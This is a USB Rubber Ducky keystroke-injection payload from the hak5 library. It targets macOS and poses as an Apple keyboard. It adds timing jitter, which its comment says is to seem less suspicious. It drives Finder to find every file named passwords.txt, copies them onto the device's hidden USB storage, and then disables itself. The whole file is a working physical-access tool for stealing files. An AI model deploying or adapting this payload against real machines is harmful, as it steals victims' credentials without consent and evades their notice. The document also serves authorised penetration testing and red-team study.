GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/Exfiltrate_file_through_GUI_mac/payload.txt
REM ###################################################
REM # |
REM # Title : Exfiltrate Files through GUI mac |
REM # Author : Kile |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : MacOS |
REM # |
REM ###################################################

REM NOTE This is not unlikely to fail depending on the speed of the search or if a large number of files meet the criteria. Adjust DELAYs to your needs

ATTACKMODE STORAGE HID VID_05AC PID_021E
DELAY 2000

REM The filename for the payload to look for
DEFINE #target passwords.txt

REM Given that it uses the GUI it is a good idea to enable jitter to be less suspicious
$_JITTER_ENABLED = TRUE

REM This function presses TAB the number of times (4) it takes to get from a Finder search to the first file result
FUNCTION DO_TABS()
    VAR $COUNTER = 0
    WHILE ($COUNTER < 4)
        TAB
        DELAY 100
        $COUNTER = ($COUNTER + 1)
    END_WHILE
END_FUNCTION

REM Open Finder
COMMAND SPACE
STRINGLN finder
DELAY 500
REM Command n spawns a new window. This makes sure there is only one Finder tab (for tabbing to the files later)
COMMAND n

REM Open the search bar in Finder
COMMAND f
DELAY 200
REM Type the target filename
STRING #target
DELAY 200
REM This specifies that the passwords.txt has to be a filename and not text inside any file
DOWN
ENTER
ENTER

REM Give it a bit of time to find all files
DELAY 500
REM Now 4 tabs to get to the first file result
DO_TABS()

REM Select all files that have the specified target in their name
COMMAND a
REM Copy the files
COMMAND c
DELAY 500
REM Go back to the search window
COMMAND f
DELAY 200
REM Delete the previous search
DEL

REM Search for DUCKY USB
STRING DUCKY
DELAY 200
DOWN
ENTER
REM Specifies that the "DUCKY" has to be an external USB drive
STRING Volume
DELAY 200
DOWN
DOWN
DOWN
ENTER
ENTER
REM This can take annoyingly long to show up, which is why the delay is so big
DELAY 6000

REM Go to the first result
DO_TABS()

REM Open the drive
COMMAND o
DELAY 1000
REM This takes a few seconds

REM Paste the copied files. This may take a few seconds depending on how many results there were, hence the long delay
COMMAND v
DELAY 7000

REM Hide
ATTACKMODE OFF